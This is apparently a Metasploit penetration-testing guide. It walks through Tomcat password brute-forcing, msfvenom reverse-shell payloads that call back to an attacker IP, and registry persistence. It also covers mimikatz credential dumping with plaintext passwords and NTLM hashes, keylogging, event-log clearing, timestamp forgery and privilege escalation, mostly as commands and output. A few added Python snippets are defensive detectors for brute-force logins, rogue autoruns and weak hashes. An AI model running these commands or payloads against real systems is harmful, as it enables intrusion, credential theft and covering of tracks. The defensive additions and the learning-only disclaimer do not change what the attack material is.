Metasploit Penetration Testing Guide

Tomcat password brute-force module in msf

use auxiliary/scanner/http/tomcat_mgr_login
show options
set rhosts 192.168.2.147
set RPORT 8080
run

  • Note: by default, Tomcat locks an account after 5 failed login attempts.
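From the defender's side, the same 5-failure threshold is a useful alert trigger. The following is an added example (not from the original post) that parses constructed Tomcat access log lines and flags source IPs with five or more 401 responses on the Manager path inside a 300-second window; the log format, IPs and timestamps are all assumed sample values.

```python
# Added example (not from the original post): count failed Manager logins per source IP
# in Tomcat access log lines, using the same 5-failure threshold the note refers to.
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in Tomcat's default "common" access log format.
SAMPLE_LOG = """\
192.168.2.10 - - [20/Aug/2020:08:50:01 +0800] "GET /manager/html HTTP/1.1" 401 2473
192.168.2.10 - - [20/Aug/2020:08:50:02 +0800] "GET /manager/html HTTP/1.1" 401 2473
192.168.2.10 - - [20/Aug/2020:08:50:02 +0800] "GET /manager/html HTTP/1.1" 401 2473
192.168.2.10 - - [20/Aug/2020:08:50:03 +0800] "GET /manager/html HTTP/1.1" 401 2473
192.168.2.10 - - [20/Aug/2020:08:50:03 +0800] "GET /manager/html HTTP/1.1" 401 2473
192.168.2.55 - - [20/Aug/2020:08:51:10 +0800] "GET /manager/html HTTP/1.1" 401 2473
192.168.2.55 - - [20/Aug/2020:08:51:20 +0800] "GET /manager/html HTTP/1.1" 200 18320
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+$'
)

def parse_line(line):
    """Return (ip, timestamp, path, status) for one access log line, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["path"], int(m["status"])

def find_bruteforce(log_text, threshold=5, window=timedelta(seconds=300)):
    """Return {ip: total 401s} for IPs with >= threshold 401s on /manager inside `window`."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[3] == 401 and rec[2].startswith("/manager"):
            failures[rec[0]].append(rec[1])
    flagged = {}
    for ip, stamps in failures.items():
        stamps.sort()
        # any run of `threshold` consecutive failures that fits inside `window` is flagged
        if any(stamps[i + threshold - 1] - stamps[i] <= window
               for i in range(len(stamps) - threshold + 1)):
            flagged[ip] = len(stamps)
    return flagged
```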

Setting up a Windows reverse shell in msf

1. Generate the Windows reverse shell

msfconsole
msfvenom -p windows/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f exe -o 4433.exe
//LHOST is the public IP of the attacking host
//LPORT is the callback port
//4433.exe is the generated file

2. Set the listening IP and port

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 2xx.94.50.153
msf5 exploit(multi/handler) > set LPORT 4433
msf5 exploit(multi/handler) > run

3. The reverse shell connects back

meterpreter > sysinfo
Computer        : WIN-UKKED2CCSHJ
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows

meterpreter > getuid
Server username: IIS APPPOOL\padt002

Setting up a Linux reverse shell in msf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=2x.94.50.153 LPORT=4433 -f elf > payload.elf
//LHOST is the public IP of the attacking host
//LPORT is the callback port
//payload.elf is the generated file

Persistence with msf

Meterpreter's persistence script injects a Meterpreter agent so that Meterpreter keeps running after the system reboots.
For a reverse connection, you can set the interval between connection attempts to the attacking host; for a bind connection, you can set it to bind an open port at a specified time.
We run the persistence script so the agent starts automatically at boot; the command is

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching exploit/multi/handler to connect to the agent
    -L <opt>  Location in target host to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on which the system running Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105
//start at system boot (-X), reconnect every 10 seconds (-i 10), use port 6666 (-p 6666), connect back to 192.168.71.105 (-r)
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WUST-3E75F1D708_20160106.3022/WUST-3E75F1D708_20160106.3022.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.71.105 LPORT=6666
[*] Persistent agent script is 148426 bytes long
[+] Persistent Script written to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[*] Starting connection handler at port 6666 for windows/meterpreter/reverse_tcp
[+] exploit/multi/handler started!
[*] Executing script C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
[+] Agent executed with PID 1308
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DNXmKhNlKXyA
meterpreter > 
[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 2 opened (192.168.71.105:6666 -> 192.168.71.112:1086) at 2016-01-06 20:30:26 +0800

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.71.112 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > sessions -i

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  2   meterpreter x86/win32  WUST-3E75F1D708\Administrator @ WUST-3E75F1D708  192.168.71.105:6666 -> 192.168.71.112:1086 (192.168.71.112)

msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > 
The persistence script is written under C:\Documents and Settings\Administrator\Local Settings\Temp\
Once persistence is set up, the session can be reopened directly from msf next time:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.71.105
lhost => 192.168.71.105
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > run

[*] Sending stage (885806 bytes) to 192.168.71.112
[*] Meterpreter session 3 opened (192.168.71.105:6666 -> 192.168.71.112:1098) at 2016-01-06 21:05:58 +0800
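The output above shows exactly what this persistence leaves on the host: a .vbs under the user's Temp directory and a Run value under HKCU with a random-looking name. The following is an added example (not from the original post) that audits `reg query`-style output for those artifacts; the OneDrive entry and the exact value data are constructed sample input, and the "random-looking name" check is a heuristic modelled on the name shown above.

```python
# Added example (not from the original post): audit HKCU/HKLM Run entries for the
# artifact the persistence script leaves behind: an autorun value that launches a
# script from the user's Temp directory. Input format mirrors `reg query` output.
import re

# Constructed sample: one benign entry plus one shaped like the post's persistence output.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive        REG_SZ    "C:\Users\admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    DNXmKhNlKXyA    REG_SZ    C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\SIjvSmRq.vbs
"""

VALUE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$")
TEMP_DIR_RE = re.compile(r"(\\Temp\\|\\LOCALS~1\\|\\AppData\\Local\\Temp\\)", re.I)
SCRIPT_EXT_RE = re.compile(r"\.(vbs|js|ps1|bat|cmd|hta)\b", re.I)

def parse_run_values(text):
    """Yield (key, name, data) for each value under each key in reg query output."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if m and key:
            yield key, m["name"], m["data"]

def looks_random(name, min_case_changes=4):
    """Heuristic: letters only and many upper/lower flips (e.g. DNXmKhNlKXyA)."""
    if not name.isalpha() or len(name) < 8:
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return flips >= min_case_changes

def find_suspicious_autoruns(text):
    """Return a list of findings: (value name, data, reasons)."""
    findings = []
    for key, name, data in parse_run_values(text):
        reasons = []
        if TEMP_DIR_RE.search(data):
            reasons.append("launches from a Temp directory")
        if SCRIPT_EXT_RE.search(data):
            reasons.append("runs a script file")
        if looks_random(name):
            reasons.append("random-looking value name")
        if reasons:
            findings.append((name, data, reasons))
    return findings
```

The cleanup resource file listed in the output above (under /root/.msf4/logs/persistence/) is the other place to confirm which value name and file path a given run created.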

Grabbing passwords with mimikatz

mimikatz - getting passwords, method 1

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;334101  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;334068  NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)
0;49101   NTLM                                    n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$
0;49101   NTLM
0;999     NTLM       WORKGROUP     CHENGLEE-PC$
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

mimikatz - getting passwords, method 2

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : chenglee-PC
BootKey    : 0648ced51b6060bed1a3654e0ee0fd93

Rid  : 500
User : Administrator
LM   :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Rid  : 501
User : Guest
LM   :
NTLM :

Rid  : 1000
User : chenglee
LM   :
NTLM : 8d0f8e1a18236379538411a9056799f5
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { chenglee ; chenglee-PC ; lizhenghua }
[1] { chenglee ; chenglee-PC ; lizhenghua }
[2] { chenglee ; chenglee-PC ; lizhenghua }
[3] { chenglee ; chenglee-PC ; lizhenghua }
[4] { chenglee-PC ; chenglee ; lizhenghua }
[5] { chenglee-PC ; chenglee ; lizhenghua }
meterpreter >

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; CLOUDVM ; 1244567 }
[1] { Administrator ; CLOUDVM ; 1244567 }
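
One thing worth noticing in the samdump::hashes output above is that the Administrator NTLM value 31d6cfe0d16ae931b73c59d7e0c089c0 is the well-known hash of an empty password. The following is an added example (not from the original post) that parses that output layout and reports empty-password accounts and hashes shared by several accounts; the "backup" account in the sample is invented to show the reuse case.

```python
# Added example (not from the original post): parse mimikatz samdump::hashes output
# and flag empty-password NTLM hashes and hashes shared by more than one account.
import re
from collections import defaultdict

EMPTY_NTLM = "31d6cfe0d16ae931b73c59d7e0c089c0"  # well-known NTLM hash of ""
# Constructed sample in the samdump::hashes layout; "backup" is invented to show reuse.
SAMPLE_SAMDUMP = """\
Rid  : 500
User : Administrator
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Rid  : 1000
User : chenglee
NTLM : 8d0f8e1a18236379538411a9056799f5

Rid  : 1001
User : backup
NTLM : 8D0F8E1A18236379538411A9056799F5
"""
FIELD_RE = re.compile(r"^(Rid|User|LM|NTLM)\s*:\s*(.*)$")

def parse_samdump(text):
    """Return one {'rid','user','lm','ntlm'} dict per account block."""
    accounts, cur = [], {}
    for line in text.splitlines():
        m = FIELD_RE.match(line.strip())
        if not m:
            continue
        key, val = m.group(1).lower(), m.group(2).strip()
        if key == "rid" and cur:          # a new "Rid" line starts the next account
            accounts.append(cur)
            cur = {}
        cur[key] = val.lower() if key in ("lm", "ntlm") else val
    return accounts + [cur] if cur else accounts

def audit_hashes(text):
    """Return {user: [reasons]} for empty-password and shared-hash accounts."""
    accounts = parse_samdump(text)
    by_hash = defaultdict(list)
    for a in accounts:
        if a.get("ntlm"):                 # blank NTLM (e.g. disabled Guest) is skipped
            by_hash[a["ntlm"]].append(a["user"])
    findings = defaultdict(list)
    for a in accounts:
        h, user = a.get("ntlm", ""), a["user"]
        if h == EMPTY_NTLM:
            findings[user].append("empty password")
        others = [u for u in by_hash.get(h, []) if u != user]
        if h and others:
            findings[user].append("hash shared with " + ", ".join(others))
    return dict(findings)
```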

mimikatz - wdigest

meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$
0;49101   NTLM
0;999     NTLM       WORKGROUP     CHENGLEE-PC$
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

mimikatz - tspkg

meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996     Negotiate  WORKGROUP     CHENGLEE-PC$
0;49101   NTLM
0;999     NTLM       WORKGROUP     CHENGLEE-PC$
0;334101  NTLM       chenglee-PC   chenglee       lizhenghua
0;334068  NTLM       chenglee-PC   chenglee       lizhenghua

Basic meterpreter commands

System commands - basic system commands

sessions
//sessions -h shows help
sessions -l
//list current sessions
sessions -i <ID>
//interact with a session
sessions -k
//kill a session
background
//send the current session to the background
run
//run an existing module; type run and press Tab twice to list the available scripts
info
//show information about an existing module
getuid
//show the current user and privilege level
getpid
//get the PID of the current process
sysinfo
//show target system information
ps
//list running processes
kill <PID>
//kill a process
idletime
//show how long the target has been idle
reboot
shutdown
//reboot / shut down
shell
//drop into a cmd shell on the target

System commands - execute: run a file

execute
//run a file on the target
execute -H -i -f cmd.exe
//create a new cmd.exe process; -H hidden, -i interactive

System commands - clearev: clear logs

clearev  #clears the Windows application, system and security event logs

File system commands - basic file system commands

getwd
pwd
//show the current working directory
ls
//list the current directory
cd
//change directory
search -f *pass*
//search for files; -h shows help
cat c:\\lltest\\lltestpasswd.txt
//show file contents
upload /tmp/hack.txt C:\\lltest
//upload a file to the target
download c:\\lltest\\lltestpasswd.txt /tmp/
//download a file to the local host
edit c:\\1.txt
//edit a file, creating it if it does not exist
rm C:\\lltest\\hack.txt
//delete a file
mkdir lltest2
//can only create a folder in the current directory
rmdir lltest2
//can only delete a folder in the current directory
getlwd
lpwd
//on the attacker host: show the current directory
lcd /tmp
//on the attacker host: change directory

File system commands - timestomp: forge timestamps

timestomp C:// -h
//show help
timestomp -v C://2.txt
//show timestamps
timestomp C://2.txt -f C://1.txt
//copy the timestamps of 1.txt onto 2.txt

Network commands - basic network commands

ipconfig/ifconfig
netstat -ano
arp
getproxy
//show proxy information
route
//show the routing table

Network commands - portfwd port forwarding

portfwd add -l 6666 -p 3389 -r 127.0.0.1
//forward the target's port 3389 to local port 6666

Network commands - port scanning

run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389

Privilege escalation

getsystem

How getsystem works:
① getsystem creates a new Windows service, set to run as SYSTEM, which connects to a named pipe when it starts.
② getsystem spawns a process that creates a named pipe and waits for a connection from that service.
③ The Windows service starts, which establishes a connection to the named pipe.
④ The process accepts the connection and calls ImpersonateNamedPipeClient, which creates an impersonation token for the SYSTEM user.
It then spawns cmd.exe with the newly obtained SYSTEM impersonation token, and we have a SYSTEM-privileged process.

Remote desktop & screenshots

enumdesktops
//list available desktops
getdesktop
//get the desktop the current meterpreter session is attached to
set_desktop
//set the desktop meterpreter is attached to; -h shows help
screenshot
//take a screenshot
use espia
//or use the espia module to take a screenshot, then enter screengrab
run vnc
//connect to the remote desktop via VNC

Remote desktop - the getgui command

run getgui -h
//show help
run getgui -e
//enable remote desktop
run getgui -u lltest2 -p 123456
//add a user
run getgui -f 6661 -e
//forward port 3389 to 6661

getgui is deprecated; run post/windows/manage/enable_rdp is recommended instead.
When getgui adds a user, the account is sometimes created successfully but has no permission to log in via remote desktop.

Remote desktop - the enable_rdp script

run post/windows/manage/enable_rdp
//enable remote desktop
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456
//add a user
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662
//forward port 3389 to 6662

The script is located at /usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb
Reading enable_rdp.rb shows that RDP is enabled by modifying the registry with reg; the user is added by calling cmd.exe and running net user; and the port forwarding uses the portfwd command.

Keylogging

keyscan_start
//start keylogging
keyscan_dump
//dump the captured keystrokes
keyscan_stop
//stop keylogging

Packet capture with sniffer

use sniffer
sniffer_interfaces
//list network interfaces
sniffer_start 2
//select an interface and start capturing
sniffer_stats 2
//show capture status
sniffer_dump 2 /tmp/lltest.pcap
//write the capture to a pcap file
sniffer_stop 2
//stop capturing

Hash harvesting - dumping hashes

run post/windows/gather/smart_hashdump
//dump password hashes from the SAM; requires SYSTEM privileges

Disclaimer

Readers are strictly prohibited from using the knowledge introduced above to perform illegal operations against websites. This article is intended only for technical exchange and learning. If you use the knowledge in this article to cause loss to others, you bear the consequences yourself. If you cannot agree to these terms, please do not read this article. Thank you for your cooperation!
